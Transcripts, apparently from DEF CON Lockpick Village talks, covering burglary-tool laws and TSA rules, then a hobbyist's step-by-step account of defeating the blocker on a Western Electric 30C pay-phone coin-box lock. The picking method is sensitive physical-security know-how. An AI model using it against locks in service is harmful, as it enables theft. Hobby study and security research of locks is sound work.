about why lockpicking laws are the way they are. What it means for you as a practitioner, dealing with lots of non-practitioners. Everyone has legal theories about lots of parts of daily life, not just lockpicking. Most of them are workable, some of them are nonsensical, some of them are absolutely bananas. Where do loopy legal theories tend to come from? Armchair lawyers. Armchair lawyers everywhere with their good old University of Wikipedia law degree. Their specialty area is something I like to call folk law. These are the ideas about law that everyone seems to know, but no one really seems to know where they came from. This is, I want my one phone call, or if you ask someone if they're a cop, they have to tell you, or I don't have to pay income taxes because I live in the free state of Jefferson. Because of folk law and all the people opining about it and spouting off about it, googling about lockpicking laws on the internet is worse than googling about that weird rash. So let's get real. Today, let's do this law school style. We're going to be concrete, specific, and clear how we use words. Let's start off this law school for lockpickers by building a law. Let's build a criminal statute called the possession of burglary tools. Because that's almost always what we're talking about when we're talking about the legality of lockpicks. Criminal laws are constructed of elements. These elements are what need to be proven beyond a reasonable doubt before someone can be legally found guilty of a crime. In the case of a burglary tool statute, there's usually two elements. Possession is physically having a tool or device, including lockpicks. And intent means criminal mindset, i.e., you intend to do something that is against the law. You can call this formula possession plus intent. Now, intent is difficult to get at. It's in your head. It's not something the court has access to. So typically in a court of law, it's shown through circumstances. In other words, part of the district attorney's job is to show circumstances that make it beyond a reasonable doubt that a person had crime in mind at the time they possessed lockpicks. No circumstances, no intent, no intent, no crime. In most states, it's as simple as that. Mere possession of lockpicks without any circumstances indicating unlawful intent, not a crime. You look across, you can see that is the vast majority of states. We call it in green just because it's nice, it's soothing, it sends the right message across. But what about those shadowy places, you say, in your best Jonathan Taylor Thomas, 1994 Simba voice? Remember how I said intent was really hard to get at? The court can't know it's in someone's mind. So who better to provide evidence about the state of someone's mind than the person themselves? That is the thinking behind that minority of states that just throw up their hands and say, you tell me. I'm looking at you, Virginia, Ohio, Mississippi, Nevada, laws change over time, but they pretty much solidified down to these four as having the possession plus intent formulation. So these states, they write their regulatory tools so that possession of lockpicks is prima facie, evidence of intent to commit a crime. We'll talk about prima facie here in a second. Here's an example from the code of Virginia. For those of you who like to follow along, this criminal code 18.2 dash 94, the possession of such burglary as tools, implements or outfit by any persons other than a licensed dealer shall be prima facie, evidence of an intent to commit burglary, robbery or larceny. So let's talk about that prima facie word. It's not law school without some Latin. Let's dive into it. Prima facie, Latin literally means on first face or on first impression, you can think of it. In plain English, that means if I didn't know better, I'd say something. I'd say you're up to no good. Turning that back into legal language, that's referred to as a rebuttable presumption. It's a presumption because it starts off set to true default value true. It's rebuttable because that default value can be changed, which means the ball is in your court or in more colloquial terms, but it's not. Vocal terms, prima facie means explaining. And I put this gif up there and I'm increasingly surprised how few people know what it's from. If you don't recognize this gif, I, congratulations on your high school graduation, I guess. Okay, so people will often say, but I have a presumption of innocence, but my constitution, I've got rights and you're right. You do have rights, at least for the time being. But the presumption of innocence is not one of the rights that's guaranteed in the Constitution. You can read it, it's not that long. You should read it, it's worth the read. And one of the things you'll notice, there's no presumption in innocence mentioned in the Constitution. It flows indirectly from the fifth, sixth and 14th amendments. A coffin versus United States is one of the first cases you study in law school. And that shows how even though it's not actually in the text, it was discovered as a necessary implication of the rights given to the rights guaranteed explicitly in the fifth, sixth and 14th amendments. More importantly though, this formulation of burglary law just won't be challenged in court because it's too much of an edge case to ever make it to trial. There's two things DAs hate, they hate crime and they hate losing cases. And because this formulation, even if it is arguably in constitutional or might be, it'll never get tested because if it's such an edge case that you might be able to make a constitutional argument, the DA will shrug his hands and throw it out. He doesn't want to go down that route. That's not what his job is. He's got much bigger fish to fry. So these kinds of problems where the law is a little unclear and common sense doesn't seem to quite match up with the way the law is written. That's why humans are in the loop. There's district attorneys with prosecutorial discretion. There's judges sitting over each trial. They're specifically there to handle exceptions where the law as written doesn't quite match up with the facts on the ground. So even if you might be able to have a constitutional problem with this formulation, know that it will probably never come to trial because no one's going to care enough about a fact pattern like that to actually push it. Now, there's kind of a sense of boo, a sense of bias about these states that have possession implies intent formulation. And a lot of people think, they're just wrong or they're nonsensible or they're anti hacker, anti lock picker. But if you look at actually what they're thinking is, it begins to make a little more sense and you have more sympathy for them. So I decided, let's look at some of them. First of all, I didn't know what the Nevada flag looked like. I had to look that up just for this presentation. Here's what Nevada decided is, they said in a case 1965 that is still good law. They said, it is consistent with all the constitutional protections of accused men to throw on them the burden of proving facts, particularly within their knowledge, and hidden from discovery by the government. This is an illustrative example of the kind of reasoning that motivates possession implies in 10 states. You don't have to agree with it, what you can see with their thinking is, if we're having trial and the goal of the trial is to find out what the truth is and whether someone is guilty. And that person has information they say is relevant to the case. They should be able to provide it if they have it, then the least they could do is show it to the court. It kind of makes sense. It's very simple. Maybe it makes some of our civil liberties impulses a little squeamish. But it's not unreasonable, especially when you consider the one that we collectively like a little bit better, which is the possession plus intent formulation, the more liberal version. So why shouldn't we imply intent? And here's an example from the District of Columbia that shows the kind of reasoning involved in arriving at the idea that possession plus intent should be the proper formulation. And what they say is, and this is great close parsing by the judge. He says, although the sledgehammer ax and hacksaw, which the appellant had, quite clearly can be used criminally, they also may, and for the most part, are used for legitimate purposes. Since the mere fact of possession of such implements has no relevance to guilt, it may not be made the occasion of casting on the defendant the obligation of exculpation. In other words, unless what you're carrying are literally drugs or something else that's similarly illegal just for existing, then the cops have to introduce additional facts to overcome the statistical likelihood that you intend to use them for a legal purpose. Most people carrying axes, sledgehammers, hax, hammers, etc, are using for legal purposes. So why in this case would we infer that they're using it for anything other than legal purpose? When you walk through it like that, it's kind of tortured logic. You have to suddenly appreciate the people who say, you know what? It's probably what it looks like, and thus you tell us otherwise. I have a lot, after doing the research for this, I have a lot more sympathy for the jurisdictions that decide to throw up their hands and say, you tell us. I know some of you in the back are saying, hey, aren't there different types of intent under the law? Yes, but that's not relevant here. Any intent will do for this particular formulation. Now, this kind of close parsing and close analysis of the way laws are written and what's the meaning behind them leads to some really funny outcomes, including my favorite lockpicking case. It turns out I have a favorite lockpicking case. We are once again back in the District of Columbia. This is a DC appeals court still relatively recently from 2014. Inray JW means it was a minor involved. So some kid under 18 got nicked by the cops, funny circumstances. Here's what happened. JW was arrested red handed trying to steal a VESPA with a pair of bolt cutters. He was charged with possession of implements of a crime, which is the usual statute that applies to lockpicking. Both elements are satisfied, no question. You sit in there middle of the night by the VESPA, both cutters in hand, definition of caught red handed, absolutely possession, absolutely intact. However, there's an inartful drafting the statute because the statute specified, doesn't usually specify, but in this case it does, it specified tools for picking locks. A meticulous appeals court judge observed that picking a lock is generally understood to require skill rather than brute force and to turn the lock without damage to the lock. He literally went and looked up the definition of picking up, picking a lock in the dictionary and came back with that and entered it in the record. As a result of reading the statute across from the definitions, it was the judge concluded not physically possible to pick a lock with bolt cutters, nor is it legally possible to convict JW under the statute as written, because try as you might, those big old bolt cutters will not fit into the lock and turn it in a non-damaging fashion. Conclusion, no possession of tools designed for picking locks and JW goes free, and anyone who complains about that gets to go back and write the statute a little bit more carefully. I think that is a great example of a judge carefully parsing the statute, holding the state to what they said they wanted, and then telling them if you want something different, you have to be a little bit more careful. Another thing I like about this is this means that we have it on record that all those savages and reprobates at conferences who destroy the locks and tie the lock picks into pretzels are not legally speaking picking locks. So here's the part that I think a lot of people show up for. The A number one, absolute main area of shouting and nonsense regarding locks and lock picking is speculation on breaking the link between possession and intent. So let's talk about it. This is in those states where possession implies intent, the minority of states, well, what can we do to protect ourselves? There's a thought that these are the places where lock picks are illegal, we have to be on our guard and we have to have an answer ready. So what do we do about it? And something that often comes up is how card, have some kind of self-made card or more professional card, poof, problem solved. This is that fantasy of holding it up to the officer and saying, don't worry officer, I have a permit for this. That couldn't be further from the truth. There is no such thing as a get out of jail free card because they're absolutely allowed to have that conversation with you. And by the time you're having that conversation, it is not in your interest to try to avoid that conversation. Instead, I want you to think of if you're having a conversation about lock picks with a cop, you now is in your interest to engage in and expand in and own that conversation rather than trying to flash some kind of card and avoid it. The tool membership card, which is forthcoming, contains a few carefully crafted paragraphs to help you achieve a productive tone in that conversation. Essentially, as it acts as a conversation starter, it's a way to help you have the conversation effectively rather than avoid the conversation. It explains that tool is an organization that exists, that recreational lockport. Locksport is a thing that exists, that the holder of the card is a member of tool, and it gives a gloss on the general state of overall laws. It doesn't overplay its hand. It basically digs down to the idea that what we teach and what we do at tool is legal everywhere in the United States by definition because locksporters and researchers have a legitimate use for their picks. They follow the two rules, which are quite famously in tool. Don't pick a lock that you don't own. Don't pick a lock upon which you rely. If you're following those rules, then you don't follow a foul of either formulation of the state law no matter where you are. That helps set the right tone. If you're a conscientious locksport practitioner, you know. Don't hide them. Don't lie about why you have them. Essentially, don't act guilty if you aren't guilty. People sometimes come to me and say, Preston, that's all well and good, but what if I'm doing this or that or the other thing? What about this circumstance? And what I always tell them is if what you're doing is a crime, then you're literally doing what the crime of possession of burglary tool says, and you have no basis to complain. If, on the other hand, you are not and you're practicing good lock sport ethics and you're following tools rules, then you can be safe in knowing that what you are doing is legal in every state in the union, and you have a card to help explain that concept to anyone who's asking. Now, we are very serious about keeping our members and our friends on the right side of the law. Nonetheless, and I want to emphasize this is not legal advice. This is just wisdom that any person in the society should know. Let me give you a rule of thumb. Call it the one crime at a time rule. If you choose to break the law, don't break the law while you're breaking the law. Don't accidentally turn a legitimate hobby into an indigable offense by carrying lock picks along on a time when you shouldn't have them. In the words of legal philosopher William Smith, in the matter of Earth versus Giant Bug, 1997, don't start nothing, won't be nothing. I have heard from many police officers and many different jurisdictions. I've asked them, I have been on public transit sitting there picking on my practice locks. And I said, hey guys, I'm sitting here picking locks. I'm pretty sure that's acceptable. Do you have any problem with it? And they say, plan on picking locks on the train. Are you planning on picking a lock on the airplane? They don't care. They have actual times to worry about if you're sitting there as a law-abiding citizen doing something that's not bothering anybody, it's not worth their time. So don't be nervous about it. And don't worry about ignorance of the law becoming a problem for you because you're willing to have that conversation. Another area that people oftentimes ask about is federal law, particularly TSA. DEF CON is one of the most common sources of that question because people say, well, I just bought lock picks, but now I can't take them on an airplane. It's not a factor because it is literally, I've lost a T somewhere, I've got to fix that, but it is literally not a factor because TSA has a set of things that they're looking for and a set of things that are not on their list. Because a lock picking tool is a non-sharp tool less than seven inches, it's carry on approved. It's simply not disallowed, which means it's allowed. And don't say this to TSA if you're having that conversation, but the locks in the cockpit doors are not even pin tumbler locks. So all the more reason for it not to be on their list. After years and years of asking them, we've got a Twitter conversation from a bunch of different people here, they finally, their agents finally added lock picks explicitly to their, can I bring my self service site on the website? So if this is a concern for you and you would like a little extra backup, then feel free, go on the website, take a screenshot, print it out, throw it in your lock pick kit. I've done it, I know a lot of friends of mine and tool have done it. We carried around our lock pick kit for years and years and years until it got ready and torn up, then we threw it away and we never used it. Once again, because TSA agents just don't care. But remember, like anything that you want to carry out of plane, the TSA agent gets the last call. So be polite, be friendly, be patient with them. Whether you're doing an opt out or bringing something unusual through carry on, just make sure you have enough time to have the discussion without being rushed or being flustered. Yes, I like opting out. There's good ethical reasons to it, even though sometimes the pain in the butt. If I'm in a hurry, I don't want to miss my flight. Yeah, I'll go through the scanner. Carrying lock picks is likewise. If I'm really in a hurry, I'll just check them. But for the most part, I like carrying them on A because I know where they are because they're valuable and make sure they don't get broken. But also to make sure that I'm practicing what I preach and telling people, yes, it's not a problem. And on the rare occasion to have those conversations, then I can make it that much easier for the next person coming behind me. If it's bringing lock picks. One of the best pieces of dice I get when I got in law school, when you're having conversations like this is always try to seem like the most reasonable person in the room in seem like the most reasonable person in the room. If you seem like you're prepared for the conversation, if it's not a surprise for you, then that really helps them be that much more calm about it. As a last resort, many airports will give the option to mail something home rather than trashing it. Another great option if you've got time to take advantage of it. Here's what I do when I'm taking my lock picks through an airport. This is my bin on the inside of security at San Francisco. Note the gigantic bag of lock picks, including the fuzzy handcuffs right on top just in case anyone wants to get curious. That's all totally legal. As are the bogataz in my wallet, which is there on the right. No one ever notices that. Ironically, the illegal thing in the picture is that little bottle of crack and rum there. I totally did not know that you're not allowed to bring little bottles through security or under the airplane. You're not allowed to provide your own booze. So yes, there is something illegal going on in that picture. No, it's not the lock picks. Yes, it is the booze. A note on having fun with TSA. I like putting the handcuffs on top because if they're going to open up the bag, I like to put a smile on their face. It gives them the problem of do they dig around the handcuffs? Are they allowed to pick the handcuffs up? This is a dildo versus your dildo territory. So as long as they're going to have the conversation, there's no reason we can't make it a little bit fun. And before you ask, yes, handcuffs are also legal or also permitted in carry on. Lots of good reasons for that, including security officers and police officers that always travel with handcuffs. A few years ago, Lady Gaga brought her own fuzzy handcuffs and there's a bit of a hubbubble about it. But they were, of course, allowed on. So fun lock pick tricks, just carry fuzzy handcuffs as well. It helps set the conversation on the right mode. A comment that I got from Max, who works with Tool, he said, always remember that you can help the conversation along by giving some framing. So if you see your bag of lock picks go through the X-ray and the person's eyes kind of light up and they shunt it off to the side for further inspection, wave at the guy as you're walking over. So that's the conversation just right. I see you've got my bag of lock picking equipment there. I do this, that or the other thing. I do locks, board as a hobby. Inside you will find the following things. You can help them get in the right frame. And there's kind of an art to helping them arrive at their own conclusions rather than dictating to them, which in a way that might make them suspicious. So don't avoid the conversation. Welcome the chance to practice the conversation. It's almost always no big deal because, again, it's a non-sharp tool less than seven inches. We'll pass handcuffs and we will go to the rest of the world. And people will often ask me now that I've talked about the United States, what about the rest of the world? And the answer is the rest of the world does not differ materially from the United States for the most part. Everywhere around the world, you'll find countries and individual jurisdictions with both formulations. The most common formulation is possession plus intent, but there are some places that have possession implies intent. So Commonwealth, UK, Australia, New Zealand, Canada, they're all legal. Some of them are possession plus intent. Some of them are possession implies intent, but none of them make it strictly illegal. Netherlands, as we know, tool having started in Netherlands, perfectly legal. And there's quite a robust culture there. Israel, a little bit more tightened down. They're definitely in the possession implies intent camp. And I'm given to understand that in China, they're fairly illegal, but like many things in China, it depends on who your patron is. So yes, when tool goes to China, we do take lock picks with us. We teach lock picking there and we get it all cleared through the process. We're cleared through the proper authorities and we haven't had a problem yet. Now there's one last thing that needs to be said before I round this out, which is 2020 is in some ways different than other years. In some ways, no different than it ever was. We're just learning more about it now. The Black Lives Matter movement has really drawn a lot more attention to the interaction between young black people, people of color and law enforcement. And it wouldn't be right to finish this talk without mentioning that all the advice I gave works great if you are a white, reasonably well-educated male lawyer. Does it work as well? If you're not some of those things, and the only answer I can tell you is all the principles remain the same, but it is absolutely hard mode. It's no surprise that you might have to speak better, understand better, make yourself heard better to get the same results. And there's nothing that I can say to make that okay in this talk or to really give a lot of insight from a perspective other than mine. But I do want to acknowledge that the law is the same and many of the same principles apply, but it's hard mode. So that is the laws of lock picking. I understand as we end this, I'll have a chance to take questions. So for anyone who has questions about lock picking in the US around the world, who has stories they want to tell, who has hypotheticals that they want to get insight on, I would be happy to share them. Mostly, thank you for showing up for this conversation. Happy lock picking. Look forward to seeing you around.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50748 (DOI)
Hey everyone, hope y'all are doing well. Hope everyone's staying safe out there. And welcome back to DEF CON safe mode. I'm nothing and yeah, so I'm going to be doing a video here. This is pretty recorded but I am going to be sitting there live with you and this is going to be going over the infamous Western Electric 30C and how I was actually able to defeat this thing. So I'm sort of kind of slow for those of you who don't know anything about this lock. And I'm actually going to start off talking about both of these here. So these locks are the result of a lot of research and development from the Western Electric Company to solve the problem of pay phones. So these are pay phone locks and these were put into place during a time where people were not huge fans of phone companies and paying for phone calls and things like that. So these locks were, there was a lot of money that went into the research and development of these and they were designed to be very resilient to everything from vandalism to weather and just all around wear and tear. And also to surreptitious entry and manipulation. So these locks were designed, there were a few before these and the original patent that I'm aware of was released in 1966. And the original patent covered many aspects of these locks but there's some things in the patent that weren't on these and there's some things on these that weren't in the patent. So this first one you see here is the Western Electric 29A and this is the lock that would protect the electronics of the pay phone. It went in the upper portion and secured the upper housing of the pay phone where all the electronic elements were. This is a five lever tumbler lock. This is actually unsprung which means that the levers do not have a spring that will turn them to their zero position. And instead when you turn the key back there is a portion on the actuator that pushes on the lower part of the levers which returns them all to the zero position. Like I said this has five levers but this big gap you see in the key here is a stationary ward that goes in between the front two levers and the rear three levers which makes it so that if you were to try to reproduce a key you would have to have that gap to fit through there and also in picking this sits down pretty low it makes it very difficult to get a picking wire behind it. So it definitely makes opening this lock without the key pretty difficult. All the levers in here had false gates as well as true gates of course. Else it wouldn't open. And actually here I have one here that has an acrylic face on it. So as you can see there's no springs. You can't see much because of this copper plate here that guards the levers. But what you can see is when I turn the key you can see all of those levers line up and that silver part that you see in there is the stationary ward. So the fence also has a cutout to go past that ward and be able to open up. This is a part of the pay phone but I'm not going to be spending a whole lot of time on this tonight. I just wanted to kind of give you a quick overview of this one so that you'd know the differences between this and the 30C. So the 30C is actually a lock with a pretty interesting history behind it. This lock was considered un-pickable for a very long time and it was considered impossible to manipulate open until a man named James Clark figured out a way to get into it and went across the country back in the 1980s stealing over half a million dollars in coins from pay phones. He evaded the police by basically continuously moving, not really following any patterns. There were a couple little patterns that he followed. He would mainly hit large sporting events, casinos, places where a lot of people would be there and a lot of people would be using the phone. And apparently he would just go into the booth, pretend to make a phone call and while he was sitting there on the phone he would manipulate the box open, steal the coins, lock it back up and leave. Nobody knows how he actually got into these things. He was on America's Most Wanted twice. He was called in the newspapers everything from the pay phone bandit, the telephone bandit, the coin box bandit. I've heard some people actually call him the phone ranger though I've never seen that in print anywhere. And I looked a lot. Honestly all I found on the phone ranger was a crappy old comic book character. It was pretty funny. But anyway he is pretty well known as the phone ranger among the community. But no one was ever, even though he was captured with his tools and actually while he was working on one of these, excuse me I'm going to have to sip a whiskey real quick. No one ever actually was able to figure out how he did it. Now the Bell Company hired retired FBI agents and spent a pretty good amount of money trying to figure out how he was able to get into these locks. And to my knowledge they never made any progress to that point. So they spent quite a long time. These locks were from the single slot Fortress pay phone. And they were in service for I think around 50 years altogether. Well 50 years ago from now I think they were possibly, some of them are still used. They are still in places but very rarely because we all know how rarely pay phones are actually used these days. But they were continuously in service for I think about 30 years or so. And previous models to this went back quite a bit further than that. But anyway he was ultimately arrested in 1988. They said he was identifiable by a ponytail, a baseball cap and I think cowboy boots. And he was caught in a pay phone playing with a lock. Or in a phone booth playing with a lock. But anyway so I hadn't heard about that story. And the first time I heard about this lock, well not the very first time, but the first time I got interested in it was when Matt Smith also known as Huxley Pig did a video. He did a talk and I saw the recorded talk on video about a few really cool locks that he had been working on. And this was one of them. And he had actually made a little bit of progress on how to go about beginning to pick this. He was still working on it and he said he had spent a lot of time and effort in trying to figure it out. And that kind of made me start to think about this lock as in kind of a goal. Just basically just thinking about how cool it would be if I could be the one that actually figured it out. And so I went online, I searched a couple articles. Matt Blaze has an amazing article on these locks. There's also a little bit of information on a couple of the lock picking forums. But it wasn't until Captain Hook released a video on Lock Pickers United about a decoding method to get into this lock to be able to go in there, figure out the key bidding, and replicate a key to open this thing. So with a set of wires similar to this with very precise measurements and little 90 degree turns on the ends, he was able to go in there and exploit the fact that returning the key to the zero position would also return all the levers to the zero position. And there was a finite and an exact measurement between the keyway and the gates and the levers. And since he was able to fit a piece of wire in there, he was then able to determine where the gates were true and false and was able to replicate and duplicate a key, make his own key, and open the lock from there. So when I saw that video, it kind of kicked me in the butt and I thought, oh man, if I'm going to do this, I better get started. So that day, I went on eBay, found one of these and ordered it. It arrived a few days later. I started messing with it, figured out why everybody had such a hard time with it. This thing is an incredible pain. But the first thing I did was actually, I think, yeah, I think the first thing I did was create an acrylic faceplate for it so that I could see inside. So basically, I knew what I was dealing with. So now this is the 30C here with an acrylic faceplate. And you can see a couple differences from the 29A. This one actually does have a spring. There's a single leaf spring here that puts tension on all the levers. If you raise one lever up, it lifts the spring and basically eliminates spring tension from the rest of the levers so they are free-floating. This one does not have that stationary ward in the center. But everything else is pretty much the same as the 29, besides this mechanism right here. And this is what makes this lock so tough. This is the tumbler blocker. And what this does is this serrated piece here, along with the points on the levers, makes it so that as soon as you put tension on this thing, that blocker moves into place and locks all the levers into place before the fence even gets to the levers. So in picking a lock, what we do is we put tension on the lock. And after you put tension on it, you manipulate the internals and you can feel, say, on a lever lock, the fence rubbing on the levers. So you'll know when you set a lever when it clicks into place. Well on this one, before you can even put tension on it, that blocker moves in and stops all those levers from being able to move. You can see here that blocker is already engaged, but the fence is super far away from the gates. Now that is for a couple different reasons they did that. Obviously, one being pick resistance and manipulation resistance. But also another being lack of maintenance. Some of these were in very remote areas where the weather and the environment was not very friendly. So if you got a lot of dirt and gunk and other things in this lock, or if there was a lot of key wear, things like that, as soon as you put the key in and it raises the levers up to an approximate height, that blocker will lock them all into place and make sure that they're at the right height for the fence to move into the gates. So that design was both for manipulation resistance, but also for longevity of the lock. And to allow it to work in some very harsh conditions. So that's what makes it so tough to pick, is that blocker there. Now the very first time I picked this lock, what I did was I bypassed that blocker. And there's a video of it online, it was the first video that I posted of this lock. And I took a shim like this, actually this is the one, inserted it in the top, and you got to get it under the anti-tamper switch, which I'll show you a little later. And that can actually hold the blocker back so that I could go in there and manipulate the levers and see what it felt like to actually pick this thing. So once I did that, I posted a video online to basically show my progress, show that I had actually picked the lock, which at the time it was a world's first. Nobody had picked one of these on camera before, even using a shim to bypass the blocker. So it was a first, but it wasn't the first that I was looking for. But after posting that video, I got quite a bit of response from people, Captain Hook being one of them. And I talked to him a bit about this lock and got some tips. We exchanged a couple little here and there's about the lock and got to talking. Captain Hook is an amazing person, great picker, one of the best in the world. And I didn't want to give too much away, but I mentioned that I had been working on a method of picking it that was entirely through the key way, which is what we're looking for. So the first thing I did was I took his idea of using bent wires to find the gates and I thought, well, what if instead of identifying the gates one at a time, what if I took a wire and bent it in a way that I could insert it in the lock in the key way and put pressure on all those levers at once? I could then pick them one at a time and get the wire to go into all the true gates, which would set the levers all to the correct height. And I could then turn the bolt and open the lock. Now this kind of worked. I was actually able to get all the levers set onto the wire, but when it came time to actually throw the bolt and open the lock, that's where I ran into some issues. It's kind of a chunky wire and there's not a lot of room to work in there. So it got in the way, unfortunately. So when I went to throw the bolt, the fence got stuck on the wire and would not move enough to actually open the lock, unfortunately. I spent a lot of time trying to perfect this wire method. That's all the scratches you see inside here was me working on the wire, trying to get it in there perfectly and get everything to work. I experimented with a lot of different ways. I tried to get all the levers set right, then put the bolt in a little bit and then remove the wire and continue, but nothing was working. I mean it was a good idea, but it ultimately failed, unfortunately. So well here's another one that I had made. This was a much flatter wire that I thought might work. It's a much weaker, much flatter wire. I figured if I could do that, maybe I could just force the bolt through the wire, bend it out of the way, but at least the lock would be open, but that didn't work either. So I started thinking about Matt, Huxley Pig's video again, and he had come up with an idea where he would overlift one of the levers up to the point where it would hold the blocker back from the top. I don't know if I can get this in here to show you how this would work, but let's see. So if you lift, oh wait a minute, I gotta turn the keyway. Get that out of the way. So if you lift up on one of the levers and you lift it past where it's supposed to go, oops, I don't think I can do this without actually turning the key, but you can get it overlifted to where it will actually get stuck up here and hold the blocker back, and I think you're actually deforming the lever at that point. It's really tough to get it up there. But it was an interesting idea, and it made me think about instead of trying to align the gates using a wire or anything like that, maybe I could use the levers to hold the blocker back, but in a different way. One day I was driving at work and talking to Captain Hook, and I had an idea. And I had to wait all day, it was super hard to wait to not leave work early or run home and try it, but I had an idea on what I could possibly do. So what I thought was if I could hold one of the levers up so that the point of the lever would sit at the point of one of these serrations, it might hold that blocker back just enough to where I could pick the levers past the blocker. Now I'd still have to deal with the blocker, they'd still be clicking in these little serrations, but it might be just enough to where it wouldn't be fully engaged and I could actually pick the lock. So I started work, as soon as I got home I started working on creating something that would make this happen. And ultimately I created this. Just this little flag tool here, it's got some warding cut into it there. And what this does, where's that tension wrench here it is, alright, so what this does is you actually insert this right into that first piece of warding all the way back and sit it into the actuator. And when it's sitting there, you then tension the lock and that little flag in the back, I don't know if you can see that, let's try to get some better light here. So that rear lever is sticking up just a little bit more than the rest of them, can you see that back there? Yeah, I think you can see that. So that is actually holding that blocker back and what I was able to do at that point was get a picking wire in there, and actually I started with the picking wire in there, but it would hold the blocker just enough that I was actually able to put tension on the lock and move the levers. And that was actually the very first way that I ever picked this lock open. And it worked, it actually worked. There's a couple videos of it online. The first one got a lot of scrutiny of course because it was a world's first. There was a little piece of wire sitting on my desk that people thought was some sort of a shim to hold the blocker back or they had all sorts of crazy ideas, but as soon as that happened I immediately did another video with a clean desk and made sure that there was no possible way whatsoever that it was not real. But that was the very first way that I picked this thing open and I was super happy if I couldn't believe it. I was just out of this world ecstatic. It was incredible, it was so great. But in thinking about it, it wasn't the easiest thing in the world. It was a very delicate balancing act and I wanted to make it even better. So with this, this was designed to hold the blocker just below that last lever's true gate. So that eighth lever would be the last one that I picked and when I picked it, it would be the last one and I only had to go one click to get it into its true gate. And I think I'm pretty sure that this one tool probably would have worked for any other lock unless that eighth lever was a zero cut if it was lower. Anything higher you could have shot it up into place. It wouldn't have been easy but it would have been doable. But if it was a zero cut, it would already be sitting too high and you'd have to hope that you could get it to drop down. Sorry, I went in my whistle again. So then I had the idea of what if I can hold all the levers up to the right height? What if I can make all the levers hold that blocker back? So it didn't matter which one I picked, when, what the binding order was. And so I started making tension wrenches. I designed a bunch of different tensioners that would go in and hold the levers up to different heights. And there was all slight problems with it. It was hard to get a wire in there and keep holding everything and it was still a very delicate balancing act. Don't get me wrong. But ultimately what I figured out was that a thin wiper insert was exactly the right height to go in there in that first ward and hold those levers up to the exact point where they need to be to hold that blocker back. And you can actually pick the lock like this too. Now again it's difficult because there's not a whole lot of room to work. But it does hold all the levers up to where you need them. And you can go in and pick. It's possible. But again that wasn't good enough. It wasn't easy enough. So I basically just started kind of playing with the lock and looking at what happened when I did different things. So I started looking at what would happen if I just tensioned it. So you just tension it. And I finally noticed if you look here when you tension this thing the blocker is not engaged. It's sitting point to point with one of these levers. But also that bolt isn't engaged either. The bottom of the fence here is actually hitting the bottom of the levers. So this lock starts in a very interesting configuration here. I mean you'd think that the blocker would engage, hold all the levers at zero. This would have no room to go in, things like that. But for some reason it's not. And all those levers are held right there. But this guy is hitting on the bottom. So if you were to put a picking wire in here you can actually start picking this lock. But unfortunately nothing's moving because that fence is stuck at the bottom there. So I started taking measurements and I realized eventually that if I took the smallest possible wiper insert and inserted it here in between the wards there that plus the picking wire was about just the right height to hold those levers at that same zero spot where the tensioner was holding them before. So what I figured out at this point was that I can actually tension the lock, then insert a picking wire. And if I just hit the couple levers that are holding the fence back I get to that spot where I want to be. Now granted it is a balancing act and that blocker will lock in a lot. So it takes a lot of resets and if you're ever trying to pick this thing do not be afraid to start over because you have to start over a lot. But eventually you'll start to learn which levers to pick first. And once you realize that you can actually go about picking this thing. So if you see that the levers are sitting at the very bottom of the blocker there holding it back just enough. So let's go in and find the lever that the fence is stuck on. Get it out of the way so the fence will then engage but the blocker is still being held back. Then I'm going to find a couple of levers and you actually want to try to pick the very tallest levers first to get them out of your way. Whoops, lever wrong. So if you ever hit a wrong lever you'll have to restart. And that's okay like I said it's going to happen a lot. So just feel around in there for a binder. Here we go find the binder. Blocker engaged again. So I'm probably not going to be able to do this live on video or not quite live but on this video here without some practice I haven't picked one of these in quite a while. But, well then maybe I'll get lucky. Oops, can drop the actuator there. So that happens when your lock's not fully put together. There it is. Yeah, right now I'm determined. I'm going too high back there. Maybe not. There we go. Alright. So, there it was. I hope that was easy enough for everyone to see. But yeah, so it is possible. That was a full pick, granted with a clear face, so it's not that impressive. Of the Western Electric 30C. So hopefully we'll get some more people out there picking these things. And yeah, I hope everybody enjoyed that greatly. So at the end of this, I'm actually going to attach the video where I pick this lock without the cover taken off, fully factory sealed with that same method. So you can see what it looks like without an acrylic cover on it. But anyway, yeah, there we are. If anyone has any questions or anything, just I've been here the whole time, so I'm sure you'll have asked them. But feel free to get a hold of me. I'm on Discord, the Lockpickers United Discord as nothing. I have a YouTube channel, which is a nothing symbol. If you search Western Electric 30C, you can find me. And I'm here. If anyone wants my email address, it's mrmr.nothingpicks at gmail.com. Reach out to me if you have any questions. If you're stuck, I will gladly help anyone through this. So, alright, there we are. Thanks a lot all. Hope you all enjoyed DEF CON, and stay safe out there. Take care. Bye. Alright, hey everyone. Hope you all are doing well. So, I have another Western Electric 30C here. This one has not been taken apart yet. All the rivets are still intact. It is just like I received it. I do have a key for it. It's got some pretty extreme bidding. It's got a zero cut right there in the two position. Five cut back there. That number four is a one cut. It's annoying trying to set those levers without over-setting anything else or bumping anything else, whatever. But it works. Sometimes I think one of those zero cut levers jumps up from the key too fast. And you can see the blocker, if you look in that corner, moving in and out. So that's still there. Yeah, so let me see if I can get this thing open here. Alright, so I kind of developed a new technique that doesn't involve that third tool. Just a picking wire and a tensioner. Kind of doing a lot of trial and error on these things and research and whatnot. Hoping to get something pretty comprehensive put together at some point. You are going to see me reset a lot because if I do anything wrong, I have to completely start over. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Okay. Um, Yes! Hell yeah! Alright there it is. Oh man! Yes, oh I'm so happy. Okay. Oh, I'm so excited right now. All right, so Yeah, since it's not taken apart I can't really Gutt it for you, but I guess I can at least kind of give you a 360 again. Let me drop this out of the way first. All right, so there it is picked open. Oh, I'm so happy. All right, now here. Let's see if we can get this Image of the blocker coming back out. There it is. All right, all. Western Electric 30C picked. All right, have a great one. Take care all.
